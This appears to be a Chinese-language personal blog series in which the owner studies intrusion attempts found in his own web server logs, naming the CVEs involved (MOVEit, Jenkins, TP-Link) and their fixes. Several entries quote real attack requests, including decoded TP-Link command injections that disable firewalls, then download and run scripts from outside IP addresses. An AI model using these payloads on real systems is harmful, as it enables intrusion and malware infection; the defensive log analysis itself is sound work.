Wey's note
只是一些隨手筆記
2024年3月21日 星期四
從 Web Log 學習系統漏洞 88
IP 116.54.77.164從中國雲南昆明來的入侵者, 不知怎麼盯上了我的網站, 我也盯了他半個月
這個月嘗試入侵上百次, 從中隨選一段
問估狗大神後得到是一個 "万户ezOFFICE OA系統"的 SQL注入漏洞
2024年1月29日 星期一
從 Web Log 學習系統漏洞 87
上次提的這個 IP(165.22.63.123)依舊持續企圖入侵, 且很多東西都還沒看過, 截出一段:
165.22.63.123 - - [27/Jan/2024:19:25:22 0800] "POST /human.aspx?Username=SQL';INSERT INTO activesessions (SessionID) values ('...');*** HTTP/1.1" 404 534 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
查了一下不確定是不是 CVE-2023-34362、CVE-2023-36934 的這個漏洞? 這是關於 MOVEit檔案傳輸管理軟體的漏洞攻擊, 攻擊者可以未經身份驗證獲得對 MOVEit Transfer資料庫的控制, 利用 SQL注入漏洞操縱資料庫並執行任何程式碼修改或取得資料庫中資料, 解決方式為更新 MOVEit Transfer至最新版本
2024年1月11日 星期四
從 Web Log 學習系統漏洞 86
最近這個 IP(165.22.63.123)從年初到現在就不斷地企圖入侵:
很多沒看過的東西, 截下某一段來看看:
165.22.63.123 - - [11/Jan/2024:11:27:31 +0800] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)@GrabResolver(name='test', root='http://aaa')@Grab(group='package', module='vulntest', version='1')import Payload; HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
經估狗後得到這是一個 Jenkins遠端程式碼執行漏洞(CVE-2019-1003000), 使用者繞過沙盒保護在 Jenkins伺服器上執行任意程式碼, 解決方式是升級相關套件(Pipeline: Declarative, Pipeline: Groovy, Script Security)
2024年1月9日 星期二
2023年12月3日 星期日
從 Web Log 學習系統漏洞 85
weblog中出現了一堆如下的記錄:
179.43.163.130 - - [02/Dec/2023:16:39:35 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+for+pid+in+%24%28ls+%2Fproc+%7C+grep+-E+%27%5E%5B0-9%5D%2B%24%27%29%3B+do+grep+-q+%27%28deleted%29%27+%2Fproc%2F%24pid%2Fmaps+%26%26+kill+-9+%24pid+%7C%7C+true%3B+done%3B+rm+-rf+lol%3B+wget+http%3A%2F%2F94.156.68.152%2Flol%3B+chmod+777+lol%3B+.%2Flol+tplink%3B+rm+-rf+lol%60) HTTP/1.1" 403 235 "-" "Hello World"
經解碼後獲得如下資訊:
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; for pid in $(ls /proc | grep -E '^[0-9]+$'); do grep -q '(deleted)' /proc/$pid/maps && kill -9 $pid || true; done; rm -rf lol; wget http://94.156.68.152/lol; chmod 777 lol; ./lol tplink; rm -rf lol`)
這是一個 CVE-2023-1389漏洞, 針對 TP-Link Archer AX21 (AX1800)路由器的漏洞攻擊, 在 Web 管理介面上的國家/地區設定中的包含命令注入漏洞, 以管理者身分允許未經身份驗證的攻擊者透過簡單的 POST 請求注入命令
查了一下來源 IP來自瑞士:
2023年9月7日 星期四
2023年8月31日 星期四
從 Web Log 學習系統漏洞 84
有趣的東西 :
216.158.236.226 - - [29/Aug/2023:22:09:39 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service%3Bsystemctl%20stop%20firewalld%3Bservice%20iptables%C2%A0stop%3Bwget%20http%3A//167.99.208.15/zizuo.sh%3Bchmod%20777%20zizuo.sh%3Bsh%20zizuo.sh) HTTP/1.1" 403 235 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
從美國來的 IP